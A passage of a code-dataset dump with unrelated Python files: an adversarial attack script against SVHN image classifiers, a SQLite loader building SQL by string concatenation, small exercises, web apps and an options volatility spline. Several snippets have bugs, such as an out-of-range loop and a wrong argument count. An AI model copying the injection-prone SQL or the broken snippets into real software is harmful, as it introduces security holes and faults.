os.path import exists\nif not exists(\"QLNES\"):\n mkdir(\"QLNES\")\npath=\"QLNES/\"+str(datetime.now())+\"/\"\nmkdir(path)\nsys.stdout=open(path+\"log.txt\",\"w\")\nData={}\nsucc=0\ntot=0\nif argv[1]==\"undef\":\n from madrySVHNUndefWrapper import *\n target_set=load(open(\"indices.pkl\",\"rb\"))\nelse:\n from madrySVHNWrapper import *\n target_set=load(open(\"def_indices.pkl\",\"rb\"))\nfor j in range(0,len(target_set),10):\n tot+=10\n print(\"Starting attack on batch\", j//10)\n corr=np.argmax(mymodel.predict(x_test[target_set[j:j+10]]),1)==y_test.reshape(-1)[target_set[j:j+10]]\n ret=attack(mymodel,x_test[target_set[j:j+10]],100,0.001,0.001,0.001,5,1,0.9,8/255,ongoing=corr,max_queries=20000)\n dump(ret[0].reshape(10,32,32,3),open(path+\"image_\"+str(j)+\"_to_\"+str(j+9)+\".pkl\",\"wb\"))\n for k in range(10):\n Data[target_set[j+k]]=(ret[2][k],ret[1][k])\n succ+=sum(ret[2])\n print(\"Success rate is\",100*succ/tot)\n dump(Data,open(path+\"data.pkl\",\"wb\"))\n","sub_path":"SVHN/testQLNES.py","file_name":"testQLNES.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"567779554","text":"# *------------------------------------------------------------------\n# * Server.py\n# *\n# * April. 2013, Mihyar Baroudi\n# *\n# * Copyright (c) 2010-2013 by cisco Systems, Inc.\n# * All rights reserved.\n# * ------------------------------------------------------------------\n\nimport onep.core.exception.OnepIllegalArgumentException\nfrom onep.core.util.Enum import enum\n\nclass Server(object):\n '''\n Server class describes the AAA Server that is used for user\n authentication. Each server is characterized by its IP Address\n and the AAA protocol.\n '''\n\n OnepAAAProtocol = enum(\n 'ONEP_AAA_PROTOCOL_RADIUS',\n 'ONEP_AAA_PROTOCOL_TACACSPLUS',\n 'ONEP_AAA_PROTOCOL_LOCAL')\n '''AAA Protocol. Only Radius, TACACS+ and Local are currently supported'''\n\n def __init__(self, address, protocol):\n '''AAA server constructor, used internally'''\n self.address = address\n '''The AAA Server IP Address'''\n self.protocol = protocol\n '''The AAA protocol supported by the AAA Server'''\n","sub_path":"X-COPY/infra/onep/presentation/python/onep/aaa/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"381797528","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 1 21:15:15 2021\n\n@author: Evgeniya Vorontsova\n\nLC Problem 58 Length of Last Word\n\nGiven a string s consisting of some words \nseparated by some number of spaces, \nreturn the length of the last word in the string.\n\nA word is a maximal substring consisting of non-space characters only.\n\nExample 1:\n\nInput: s = \"Hello World\"\nOutput: 5\nExplanation: The last word is \"World\" with length 5.\n\nExample 2:\n\nInput: s = \" fly me to the moon \"\nOutput: 4\nExplanation: The last word is \"moon\" with length 4.\n\nExample 3:\n\nInput: s = \"luffy is still joyboy\"\nOutput: 6\nExplanation: The last word is \"joyboy\" with length 6.\n\nConstraints:\n\n 1 <= s.length <= 10^4\n s consists of only English letters and spaces ' '.\n There will be at least one word in s.\n\"\"\"\n\nclass Solution:\n def lengthOfLastWord(self, s: str) -> int:\n s = s.strip()\n len_s = len(s)\n i = len_s - 1\n last_word = 0\n while s[i] != \" \" and i >= 0:\n last_word = last_word + 1\n i = i - 1\n return last_word\n\n# Tests\ns = \" fly me to the moon \"\nclass_instance = Solution()\nrez = Solution.lengthOfLastWord(class_instance, s) \nprint(rez) \n","sub_path":"058/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"612621987","text":"#!/bin/python3\n# -*- conding: utf-8 -*-\n\n\"\"\"\n--------------------\n TD: nombre mystère\n--------------------\n\"\"\"\n\nfrom random import randint\nfrom time import sleep\nimport stdiomask\n\ndef dispMenu():\n\tmenu = [\n\t\t\"0. Noob\\t\\t\\t[0-1]\",\n\t\t\"1. Facile\\t\\t[0-10]\",\n\t\t\"2. Normal\\t\\t[0-100]\",\n\t\t\"3. Difficile\\t\\t[0-1000]\",\n\t\t\"4. Hardcore\\t\\t[0-10000]\",\n\t\t\"5. Cauchemardesque\\t[0-100000]\",\n\t\t\"6. ROXOR\\t\\t[0-1000000]\",\n\t]\n\n\tprint(\"\\nChoisit le niveau de difficulté:\")\n\n\tfor item in menu:\n\t\tprint(item)\n\t\tsleep(.01)\n\n\tprint(\"\\n99. Exit\")\n\n\treturn(len(menu) - 1)\n\ndef multiPlayer():\n\tanswer = input(\"Tu veux jouer avec un pote ou pas ? (Yes/No)\\n> \")\n\treturn True if(answer in (\"y\", \"Y\", \"Yes\")) else False\n\ndef playerName():\n\tprint(\"Entrer vos noms les fifous\")\n\n\treturn [\n\t\tinput(\"Player 1: \"),\n\t\tinput(\"Player 2: \")\n\t]\n\ndef game(max, multi):\n\tplayer = playerName\n\tM = randint(0, max)\n\tN = -1\n\ti = 1\n\n\twhile(N != M):\n\t\ttry:\n\t\t\tshowPlayer = i%2 if(multi) else 0\n\t\t\tmsgInput = \"\\n{}, entre un nombre !\\n> \".format(player[showPlayer])\n\t\t\tN = int(stdiomask.getpass(prompt = msgInput)) if(multi) else int(input(msgInput))\n\t\t\tprint(\"C'est imense\") if(N > M) else print(\"C'est rikiki\")\n\t\t\ti += 1\n\n\t\texcept Exception:\n\t\t\tprint(\"On a dit un nombre idiot !\")\n\n\tprint(\"\\nGG WP {} !\".format(player[showPlayer]))\n\tprint(\"T'as tout de même fait {} Essaie(s)\".format(i))\n\ndef retry():\n\tanswer = input(\"On s'en refait une ? (Yes/No)\\n> \")\n\n\tif(answer in (\"y\", \"Y\", \"Yes\")):\n\t\tdispMenu()\n\t\treturn True\n\n\telse:\n\t\treturn False\n\ndef main():\n\tdiffCount = dispMenu()\n\n\twhile(True):\n\t\ttry:\n\t\t\tdiff = int(input(\"\\n> \"))\n\n\t\t\tif((diff >= 0) and (diff <= diffCount)):\n\t\t\t\tgame(10**diff, multiPlayer())\n\n\t\t\t\tif not(retry()):\n\t\t\t\t\tbreak\n\n\t\t\telif(diff == 99):\n\t\t\t\tbreak\n\n\t\t\telse:\n\t\t\t\tprint(\"T'es un p'tit mâlin toi dit donc !\")\n\n\t\texcept Exception:\n\t\t\tprint(\"Pas de carabistouille enfoirée !\")\n\nif(__name__ == '__main__'):\n\tplayerName = playerName()\n\tmain()\n\tprint(\"Bye kheyou !\")\n","sub_path":"TRASH/mysteryNumber.py","file_name":"mysteryNumber.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"233727722","text":"\nfrom django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf.urls import handler404, handler500\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('home.urls')),\n path('accounts/', include('accounts.urls')),\n path('accounts/', include('django.contrib.auth.urls')),\n path('blog/',include('blog.urls'))\n]\n\nhandler404 = 'home.views.error'\nhandler500 = 'home.views.error'","sub_path":"Pythonweb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"24810495","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport operator\nimport requests\nfrom bs4 import BeautifulSoup\nimport sqlite3\n\n\n\n#conn = sqlite3.connect(\"db.sqlite3\")\nconn=sqlite3.connect(\"/workspace/USpressM3/db.sqlite3\")\ncur = conn.cursor()\n\nwith open ('negative-words.txt') as fp:\n for line in fp:\n line2 = line.rstrip('\\n')\n SQL = \"INSERT OR IGNORE INTO negativewords (words) VALUES\" + \"(\" + \"'\" + line2 + \"'\" + \")\"\n print(SQL)\n\n cur.execute(SQL)\n\ncur.execute(\"select * from negativewords\")\nrows = cur.fetchall()\nprint(\"If you see the following, that means the DB is working!\")\nprint(rows)\n\nconn.commit()\nconn.close()\n","sub_path":"USpressM3/DBInsertN.py","file_name":"DBInsertN.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"11513472","text":"import sys\nimport warnings\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom datasets.preprocessing import process_data\nfrom saved_model import model\nfrom keras.models import Model\nfrom keras.callbacks import EarlyStopping\nwarnings.filterwarnings(\"ignore\")\n\n\ndef train_lstm(model, x_train, y_train, name):\n\n model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])\n\n hist = model.fit(\n x_train, y_train,\n batch_size=10,\n epochs=20,\n validation_split=0.05)\n\n model.save('saved_model/' + name + '.h5')\n df = pd.DataFrame.from_dict(hist.history)\n df.to_csv('saved_model/' + name + ' loss.csv', encoding='utf-8', index=False)\n\ndef train_cnn(model, x_train, y_train, name):\n\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n hist = model.fit(\n x_train, y_train,\n batch_size=25,\n epochs=20,\n validation_split=0.05)\n\n model.save('saved_model/' + name + '.h5')\n df = pd.DataFrame.from_dict(hist.history)\n df.to_csv('saved_model/' + name + ' loss.csv', encoding='utf-8', index=False)\n\ndef lstm(x_train, y_train):\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n m = model.lstm_model([12, 128 , 64, 1])\n train_lstm(m, x_train, y_train, \"lstm\")\n\ndef cnn(x_train, y_train):\n x_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\n m = model.cnn_model()\n train_cnn(m, x_train, y_train, \"cnn\")\n\ndef main():\n\n lag = 12\n training_data = 'datasets/train.csv'\n test_data = 'datasets/test.csv'\n x_train, y_train, _, _, _ = process_data(training_data, test_data, lag)\n \n i = 0\n\n while i < 2:\n\n lstm(x_train, y_train)\n\n cnn(x_train, y_train)\n\n i = i + 1\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"361676842","text":"# Checks input is a number more than a given number\ndef num_check(question):\n valid = False\n while not valid:\n\n error = \"Please enter a number that is more than (or equal to) one\"\n\n try:\n\n # Ask user to enter a number\n response = float(input(question))\n\n # Checks number is more than or equal to one and less than or equal to 200\n if 1 <= response <= 200:\n return response\n\n # Outputs error if input is invalid\n else:\n print(error)\n print()\n\n except ValueError:\n print(error)\n print()\n\n# Main routine goes here\nkeep_going = \"\"\nwhile keep_going == \"\":\n print()\n\n # Ask user for an integer (must be more than or equal to 1)\n var_integer = num_check(\"Enter an integer:\", 1) \n","sub_path":"01_integer_checker.py","file_name":"01_integer_checker.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"336859577","text":"__author__ = 'tombnorwood'\n\nimport logging\nimport math\n\nimport numpy as np\nimport xalglib\n\nfrom sqlalchemy import event\n\nfrom avkoptionsmodels.models import Base, VolModel\nfrom avkoptionsmodels.models.session import get_session_from_connection\nfrom avkoptionsmodels.models.volcurves import VolCurveInput, SkewInput\n\nfrom .ocvolcurve import OCVolCurve\n\nlog = logging.getLogger(__name__)\n\n\nclass OCFlexibleSpline(OCVolCurve):\n __mapper_args__ = {\n 'polymorphic_identity': 'OCFlexibleSpline'\n }\n\n def _init_inputs(self):\n super(OCFlexibleSpline, self)._init_atm_vol_inputs()\n wide_skew_input = SkewInput()\n wide_skew_input.name = \"wide_skew\"\n wide_skew_input.value = 0.0\n wide_skew_input.is_risk_input = True\n wide_skew_input.default_increment = .001\n wide_skew_input.vol_curve = self\n wide_skew_input.display_name = \"wide_skew\"\n wide_skew_input.display_order = 2\n \n tight_skew_input = SkewInput()\n tight_skew_input.name = \"tight_skew\"\n tight_skew_input.value = 0.0\n tight_skew_input.is_risk_input = True\n tight_skew_input.default_increment = .001\n tight_skew_input.vol_curve = self\n tight_skew_input.display_name = \"tight_skew\"\n tight_skew_input.display_order = 3\n \n put_curve_input = VolCurveInput()\n put_curve_input.name = \"put_curve\"\n put_curve_input.value = 0.0\n put_curve_input.is_risk_input = True\n put_curve_input.default_increment = .001\n put_curve_input.vol_curve = self\n put_curve_input.display_name = \"pc\"\n put_curve_input.display_order = 4\n \n call_curve_input = VolCurveInput()\n call_curve_input.name = \"call_curve\"\n call_curve_input.value = 0.0\n call_curve_input.is_risk_input = True\n call_curve_input.default_increment = .001\n call_curve_input.vol_curve = self\n call_curve_input.display_name = \"cc\"\n call_curve_input.display_order = 5\n\n put_first_input = VolCurveInput()\n put_first_input.name = \"put_first_diff\"\n put_first_input.value = 0.0\n put_first_input.is_risk_input = True\n put_first_input.default_increment = .001\n put_first_input.vol_curve = self\n put_first_input.display_name = \"p1d\"\n put_first_input.display_order = 6\n \n put_second_input = VolCurveInput()\n put_second_input.name = \"put_second_diff\"\n put_second_input.value = 0.0\n put_second_input.is_risk_input = True\n put_second_input.default_increment = .001\n put_second_input.vol_curve = self\n put_second_input.display_name = \"p2d\"\n put_second_input.display_order = 7\n \n put_wing_input = VolCurveInput()\n put_wing_input.name = \"put_wing_diff\"\n put_wing_input.value = 0.0\n put_wing_input.is_risk_input = True\n put_wing_input.default_increment = .001\n put_wing_input.vol_curve = self\n put_wing_input.display_name = \"pwd\"\n put_wing_input.display_order = 8\n \n put_first_x_input = VolCurveInput()\n put_first_x_input.name = \"put_first_x\"\n put_first_x_input.value = 0.0\n put_first_x_input.is_risk_input = False\n put_first_x_input.default_increment = .1\n put_first_x_input.vol_curve = self\n put_first_x_input.display_name = \"p1x\"\n put_first_x_input.display_order = 9\n \n put_second_x_input = VolCurveInput()\n put_second_x_input.name = \"put_second_x\"\n put_second_x_input.value = 0.0\n put_second_x_input.is_risk_input = False\n put_second_x_input.default_increment = .1\n put_second_x_input.vol_curve = self\n put_second_x_input.display_name = \"p2x\"\n put_second_x_input.display_order = 10\n \n put_wing_x_input = VolCurveInput()\n put_wing_x_input.name = \"put_wing_x\"\n put_wing_x_input.value = 0.0\n put_wing_x_input.is_risk_input = False\n put_wing_x_input.default_increment = .1\n put_wing_x_input.vol_curve = self\n put_wing_x_input.display_name = \"pwx\"\n put_wing_x_input.display_order = 11\n\n call_first_input = VolCurveInput()\n call_first_input.name = \"call_first_diff\"\n call_first_input.value = 0.0\n call_first_input.is_risk_input = True\n call_first_input.default_increment = .001\n call_first_input.vol_curve = self\n call_first_input.display_name = \"c1d\"\n call_first_input.display_order = 12\n\n call_second_input = VolCurveInput()\n call_second_input.name = \"call_second_diff\"\n call_second_input.value = 0.0\n call_second_input.is_risk_input = True\n call_second_input.default_increment = .001\n call_second_input.vol_curve = self\n call_second_input.display_name = \"c2d\"\n call_second_input.display_order = 13\n\n call_wing_input = VolCurveInput()\n call_wing_input.name = \"call_wing_diff\"\n call_wing_input.value = 0.0\n call_wing_input.is_risk_input = True\n call_wing_input.default_increment = .001\n call_wing_input.vol_curve = self\n call_wing_input.display_name = \"cwd\"\n call_wing_input.display_order = 14\n\n call_first_x_input = VolCurveInput()\n call_first_x_input.name = \"call_first_x\"\n call_first_x_input.value = 0.0\n call_first_x_input.is_risk_input = False\n call_first_x_input.default_increment = .1\n call_first_x_input.vol_curve = self\n call_first_x_input.display_name = \"c1x\"\n call_first_x_input.display_order = 15\n\n call_second_x_input = VolCurveInput()\n call_second_x_input.name = \"call_second_x\"\n call_second_x_input.value = 0.0\n call_second_x_input.is_risk_input = False\n call_second_x_input.default_increment = .1\n call_second_x_input.vol_curve = self\n call_second_x_input.display_name = \"c2x\"\n call_second_x_input.display_order = 16\n\n call_wing_x_input = VolCurveInput()\n call_wing_x_input.name = \"call_wing_x\"\n call_wing_x_input.value = 0.0\n call_wing_x_input.is_risk_input = False\n call_wing_x_input.default_increment = .1\n call_wing_x_input.vol_curve = self\n call_wing_x_input.display_name = \"cwx\"\n call_wing_x_input.display_order = 17\n\n put_wing_slope_input = VolCurveInput()\n put_wing_slope_input.name = \"put_wing_slope_diff\"\n put_wing_slope_input.value = 0.0\n put_wing_slope_input.is_risk_input = True\n put_wing_slope_input.default_increment = -.01\n put_wing_slope_input.vol_curve = self\n put_wing_slope_input.display_name = \"pwsd\"\n put_wing_slope_input.display_order = 18\n\n call_wing_slope_input = VolCurveInput()\n call_wing_slope_input.name = \"call_wing_slope_diff\"\n call_wing_slope_input.value = 0.0\n call_wing_slope_input.is_risk_input = True\n call_wing_slope_input.default_increment = .01\n call_wing_slope_input.vol_curve = self\n call_wing_slope_input.display_name = \"cwsd\"\n call_wing_slope_input.display_order = 19\n\n def _build_interpolant(self, time_to_exp, atm_strike, atm_vol,\n put_first, put_second, put_wing,\n put_first_x, put_second_x, put_wing_x,\n call_first, call_second, call_wing,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope=None, call_wing_slope=None):\n # spline_x defined as strikes spaced according to std deviations from atm\n std_dev = atm_strike * atm_vol * math.sqrt(time_to_exp)\n spline_x = np.array((put_wing_x, put_second_x, put_first_x, 0.0, call_first_x, call_second_x, call_wing_x))\n spline_x *= std_dev\n\n if not spline_x.any():\n log.error(\"spline_x points are all equal, unable to build spline: spline_x=%s\", spline_x)\n raise ValueError(\"spline_x points are all equal, unable to build spline\")\n spline_x += atm_strike\n\n # spline_y defined as atm_vol plus offset at each curve point\n spline_y = np.array((put_wing, put_second, put_first, 0.0, call_first, call_second, call_wing))\n spline_y += atm_vol\n\n log.debug(\"spline_x: %s\", spline_x)\n log.debug(\"spline_y: %s\", spline_y)\n if put_wing_slope and call_wing_slope:\n # build clamped spline where terminal d'=wing_slope and d''=0\n log.debug(\"building clamped cubic spline\")\n spline_interpolant = xalglib.spline1dbuildcubic(list(spline_x), list(spline_y), 7, 1, put_wing_slope, 1, call_wing_slope)\n else:\n # build natural spline where boundaries are parabolically terminated\n log.debug(\"building parabolically terminated cubic spline\")\n spline_interpolant = xalglib.spline1dbuildcubic(list(spline_x), list(spline_y), 7, 0, 0, 0, 0)\n return spline_interpolant\n\n def _get_calc_inputs_from_curve_inputs(self, time_to_exp, atm_strike, atm_vol,\n wide_skew, tight_skew, put_curve, call_curve,\n put_first_diff, put_second_diff, put_wing_diff,\n put_first_x, put_second_x, put_wing_x,\n call_first_diff, call_second_diff, call_wing_diff,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope_diff, call_wing_slope_diff):\n put_first = put_first_x * (wide_skew + tight_skew) + put_first_x**2 * put_curve + put_first_diff\n put_second = put_second_x * wide_skew + put_second_x**2 * put_curve + put_second_diff\n put_wing = put_wing_x * wide_skew + put_wing_x**2 * put_curve + put_wing_diff\n call_first = call_first_x * (wide_skew + tight_skew) + call_first_x**2 * call_curve + call_first_diff\n call_second = call_second_x * wide_skew + call_second_x**2 * call_curve + call_second_diff\n call_wing = call_wing_x * wide_skew + call_wing_x**2 * call_curve + call_wing_diff\n log.debug(\"time_to_exp: %s\", time_to_exp)\n log.debug(\"atm_strike: %s\", atm_strike)\n log.debug(\"atm_vol: %s\", atm_vol)\n log.debug(\"put_first: %s\", put_first)\n log.debug(\"put_second: %s\", put_second)\n log.debug(\"put_wing: %s\", put_wing)\n log.debug(\"call_first: %s\", call_first)\n log.debug(\"call_second: %s\", call_second)\n log.debug(\"call_wing: %s\", call_wing)\n try:\n interpolant = \\\n self._build_interpolant(time_to_exp, atm_strike, atm_vol,\n put_first, put_second, put_wing,\n put_first_x, put_second_x, put_wing_x,\n call_first, call_second, call_wing,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope=None, call_wing_slope=None)\n std_dev = atm_strike * atm_vol * math.sqrt(time_to_exp)\n put_wing_strike = std_dev * put_wing_x + atm_strike\n put_wing_vol = put_wing + atm_vol\n call_wing_strike = std_dev * call_wing_x + atm_strike\n call_wing_vol = call_wing + atm_vol\n incremented_put_strike_vol = xalglib.spline1dcalc(interpolant, put_wing_strike + 1.0)\n incremented_call_strike_vol = xalglib.spline1dcalc(interpolant, call_wing_strike - 1.0)\n log.debug(\"std_dev: %s\", std_dev)\n log.debug(\"put_wing_strike: %s\", put_wing_strike)\n log.debug(\"put_wing_vol: %s\", put_wing_vol)\n log.debug(\"call_wing_strike: %s\", call_wing_strike)\n log.debug(\"call_wing_vol: %s\", call_wing_vol)\n log.debug(\"incremented_put_strike_vol: %s\", incremented_put_strike_vol)\n log.debug(\"incremented_call_strike_vol: %s\", incremented_call_strike_vol)\n put_wing_slope = incremented_put_strike_vol - put_wing_vol + put_wing_slope_diff\n call_wing_slope = call_wing_vol - incremented_call_strike_vol + call_wing_slope_diff\n except ValueError:\n log.error(\"error when calculating implied slopes\")\n put_wing_slope = 0 + put_wing_slope_diff\n call_wing_slope = 0 + call_wing_slope_diff\n log.debug(\"put_wing_slope: %s\", put_wing_slope)\n log.debug(\"call_wing_slope: %s\", call_wing_slope)\n calc_inputs = {\n \"atm_strike\": atm_strike,\n \"atm_vol\": atm_vol,\n \"put_first\": put_first,\n \"put_second\": put_second,\n \"put_wing\": put_wing,\n \"put_first_x\": put_first_x,\n \"put_second_x\": put_second_x,\n \"put_wing_x\": put_wing_x,\n \"call_first\": call_first,\n \"call_second\": call_second,\n \"call_wing\": call_wing,\n \"call_first_x\": call_first_x,\n \"call_second_x\": call_second_x,\n \"call_wing_x\": call_wing_x,\n \"put_wing_slope\": put_wing_slope,\n \"call_wing_slope\": call_wing_slope,\n }\n return calc_inputs\n\n def calc_strike_vols(self, strikes, underlying_price, time_to_exp, atm_strike, atm_vol,\n wide_skew, tight_skew, put_curve, call_curve,\n put_first_diff, put_second_diff, put_wing_diff,\n put_first_x, put_second_x, put_wing_x,\n call_first_diff, call_second_diff, call_wing_diff,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope_diff, call_wing_slope_diff):\n if time_to_exp <= 0.0:\n log.warn(\"time_to_exp<=0, returning atm_vol for all strike vols: atm_vol=%s\", atm_vol)\n strike_vols = np.empty_like(strikes)\n strike_vols.fill(atm_vol)\n return strike_vols\n calc_inputs = \\\n self._get_calc_inputs_from_curve_inputs(time_to_exp, atm_strike, atm_vol,\n wide_skew, tight_skew, put_curve, call_curve,\n put_first_diff, put_second_diff, put_wing_diff,\n put_first_x, put_second_x, put_wing_x,\n call_first_diff, call_second_diff, call_wing_diff,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope_diff, call_wing_slope_diff)\n try:\n interpolant = self._build_interpolant(time_to_exp, **calc_inputs)\n\n # calculate boundary conditions\n std_dev = atm_strike * atm_vol * math.sqrt(time_to_exp)\n put_wing_strike = put_wing_x * std_dev + atm_strike\n put_wing_vol = calc_inputs[\"put_wing\"] + atm_vol\n put_wing_slope = calc_inputs[\"put_wing_slope\"]\n call_wing_strike = call_wing_x * std_dev + atm_strike\n call_wing_vol = calc_inputs[\"call_wing\"] + atm_vol\n call_wing_slope = calc_inputs[\"call_wing_slope\"]\n\n strike_vols = np.empty_like(strikes, dtype=float)\n for i, strike in enumerate(strikes):\n if strike < put_wing_strike:\n strike_vol = put_wing_vol + (strike - put_wing_strike) * put_wing_slope\n elif strike > call_wing_strike:\n strike_vol = call_wing_vol + (strike - call_wing_strike) * call_wing_slope\n else:\n strike_vol = xalglib.spline1dcalc(interpolant, strike)\n strike_vols[i] = strike_vol\n except ValueError:\n log.error(\"unable to build cubic spline, return atm_vol for all vols: atm_vol=%s\", atm_vol)\n strike_vols = np.empty_like(strikes)\n strike_vols.fill(atm_vol)\n return strike_vols\n\n\n@event.listens_for(Base.metadata, \"after_create\")\ndef prepopulate_vol_models(target, connection, **kw):\n session = get_session_from_connection(connection)\n vol_model = VolModel(name=\"OCFlexibleSpline\")\n session.add(vol_model)\n session.commit()\n","sub_path":"models/volcurves/optionscity/ocflexiblespline.py","file_name":"ocflexiblespline.py","file_ext":"py","file_size_in_byte":16359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"76073765","text":"import json\nimport pickle\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport plotly\nfrom flask import Flask\nfrom flask import render_template, request\nfrom plotly.graph_objs import Bar\n\nsys.path.append(\".\")\nsys.path.append(\"../\")\nfrom models import train_classifier as tc\n\napp = Flask(__name__)\n\n_pipe = None\n_clf1 = None\n_clf2 = None\n\n\ndef load_model(model_filepath):\n global _pipe, _clf1, _clf2\n with open(model_filepath, 'rb') as f:\n rodelbahn_model = pickle.load(f)\n _pipe = rodelbahn_model[\"pipe\"]\n _clf1 = rodelbahn_model[\"clf1\"]\n _clf2 = rodelbahn_model[\"clf2\"]\n\n\ndef text_prep(text):\n global _pipe\n return _pipe.transform(np.array([text]))\n\n\ndef apply_model(x_transformed):\n global _clf1, _clf2\n labels_zuordnung_mlp = _clf1.classes_\n y_pred_mlp_proba = _clf1.predict_proba(x_transformed)\n y_pred_mlp_label = np.array([labels_zuordnung_mlp[np.argmax(t)] for t in y_pred_mlp_proba])\n y_pred_moc_labels = np.array(_clf2.predict(x_transformed))\n return y_pred_mlp_label, y_pred_moc_labels\n\n\n# load data\nDATA, Y, target = tc.load_data(\"./data/DisasterResponse.db\")\nY = pd.DataFrame(Y)\nY.columns = target\n\n# load model\nload_model(\"./data/rodelbahn_model.pckl\")\n\n\ndef show_example():\n t = pd.Series(DATA).sample()\n print(t.iloc[0])\n print(Y.iloc[int(t.index[0])].to_dict())\n\n\n# index webpage displays 2 visuals and receives user input text for model's prediction\n@app.route('/')\n@app.route('/index')\ndef index():\n res = Y.groupby('genre').count()\n genre_counts = list(res.values[:, 0])\n genre_names = list(res.index)\n\n xdf = Y.copy()\n for xcol in xdf.columns:\n if xcol != 'genre':\n xdf[xcol] = [int(t) for t in xdf[xcol]]\n\n res = xdf[xdf['genre'] == \"direct\"].mean().sort_values(ascending=False)\n needs_percentage = res.values.tolist()\n needs_labels = res.index.values.tolist()\n\n graphs = [\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts\n )\n ],\n\n 'layout': {\n 'title': 'Count of messages per genre',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n },\n {\n 'data': [\n Bar(\n x=needs_labels,\n y=needs_percentage\n )\n ],\n\n 'layout': {\n 'title': 'Most current needs for direct messages',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"\",\n 'tickangle': 45\n }\n }\n }\n ]\n\n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n\n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n query = request.args.get('query', '')\n y_pred_mlp_label, y_pred_moc_labels = apply_model(text_prep(query))\n\n # leads to output such as: \"Genre: direct\", always 1\n classification_results = dict(zip(\n [\"Genre: {}\".format(y_pred_mlp_label[0])] + target[1:],\n [\"1\"] + list(y_pred_moc_labels[0])))\n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"339244743","text":"#import re\n#f=open('liste_verbes_kabyles.txt', 'r', encoding='utf-8')\n#new_file= [line for line in f]\n#print(f.readlines())\n\nreplacements = {'0':'', '1':'', '2':'','3':'', '4':'', '5':'','6':'', '7':'', '8':'', '9':''}\n\nwith open('copieVerbesKabyles.txt', 'r', encoding='utf-8') as infile, open('verbes_kabyles.txt', 'w', encoding='utf-8') as outfile:\n myList= list(infile)\n mylist = [line.rstrip('\\n') for line in infile]\n for line in myList:\n for src, target in replacements.items():\n line = line.replace(src, target)\n\n newFile=outfile.write(line)\n\n\nwith open('verbes_kabyles.txt', 'r', encoding='utf-8') as f:\n m = [line.split('(') for line in f]\n","sub_path":"strip_digits.py","file_name":"strip_digits.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"503964177","text":"'''\nDesign your implementation of the linked list. You can choose to use the singly\nlinked list or the doubly linked list. A node in a singly linked list should\nhave two attributes: val and next. val is the value of the current node, and\nnext is a pointer/reference to the next node. If you want to use the doubly\nlinked list, you will need one more attribute prev to indicate the previous\nnode in the linked list. Assume all nodes in the linked list are 0-indexed.\nImplement these functions in your linked list class:\nget(index) : Get the value of the index-th node in the linked list. If the\nindex is invalid, return -1.\naddAtHead(val) : Add a node of value val before the first element of the linked\nlist. After the insertion, the new node will be the first node of the linked\nlist.\naddAtTail(val) : Append a node of value val to the last element of the linked\nlist.\naddAtIndex(index, val) : Add a node of value val before the index-th node in\nthe linked list. If index equals to the length of linked list, the node will\nbe appended to the end of linked list. If index is greater than the length, the node will not be inserted.\ndeleteAtIndex(index) : Delete the index-th node in the linked list, if the\nindex is valid.\nExample:\nMyLinkedList linkedList = new MyLinkedList();\nlinkedList.addAtHead(1);\nlinkedList.addAtTail(3);\nlinkedList.addAtIndex(1, 2); // linked list becomes 1->2->3\nlinkedList.get(1); // returns 2\nlinkedList.deleteAtIndex(1); // now the linked list is 1->3\nlinkedList.get(1); // returns 3\nNote:\nAll values will be in the range of [1, 1000].\nThe number of operations will be in the range of 